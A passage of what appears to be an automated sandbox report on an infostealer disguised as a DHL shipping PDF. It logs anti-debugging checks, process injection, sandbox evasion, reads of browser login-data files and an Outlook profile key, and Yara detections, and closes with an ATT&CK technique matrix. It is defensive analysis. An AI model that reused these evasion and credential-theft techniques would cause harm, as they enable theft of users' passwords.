                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595828Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595718Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595609Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595499Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595390Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595281Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595171Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 595062Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594952Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594833Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594696Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594578Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594468Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594355Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 594070Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593815Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593646Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593515Jump to behavior
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exeThread delayed: delay time: 593405Jump to behavior
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000000.00000002.1107898524.00000000046F5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: oixmnVMciL
                  Source: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe, 00000002.00000002.3536090999.00000000010A7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 0_2_02DB1A98 CheckRemoteDebuggerPresent,0_2_02DB1A98
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process queried: DebugPort
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Code function: 2_2_0104C168 LdrInitializeThunk,LdrInitializeThunk,2_2_0104C168
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process token adjusted: Debug
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, UltraSpeed.cs Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, FFDecryptor.cs Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Memory written: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Process created: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe "C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe"
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Data.DataSetExtensions\v4.0_4.0.0.0__b77a5c561934e089\System.Data.DataSetExtensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara match File source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara match File source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara match File source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR
                  Source: Yara match File source: 00000002.00000002.3537228103.0000000002E74000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\DHL Shipping Details Ref ID 446331798008765975594-pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                  Remote Access Functionality

                  Source: Yara matchFile source: 2.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.494d860.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.DHL Shipping Details Ref ID 446331798008765975594-pdf.exe.4936a40.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000002.00000002.3534770188.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1107898524.0000000004936000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6876, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: DHL Shipping Details Ref ID 446331798008765975594-pdf.exe PID: 6984, type: MEMORYSTR

                  | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
                  |---|---|---|---|---|---|---|---|---|---|---|---|---|---|
                  | Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 1 Native API | 1 DLL Side-Loading | 111 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 111 Security Software Discovery | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
                  | Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 Input Capture | 1 Process Discovery | Remote Desktop Protocol | 1 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
                  | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 51 Virtualization/Sandbox Evasion | Security Account Manager | 51 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | 11 Archive Collected Data | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
                  | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 111 Process Injection | NTDS | 1 Application Window Discovery | Distributed Component Object Model | 1 Data from Local System | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
                  | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 1 System Network Configuration Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
                  | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 3 Obfuscated Files or Information | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
                  | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 13 Software Packing | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
                  | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 1 Timestomp | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
                  | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |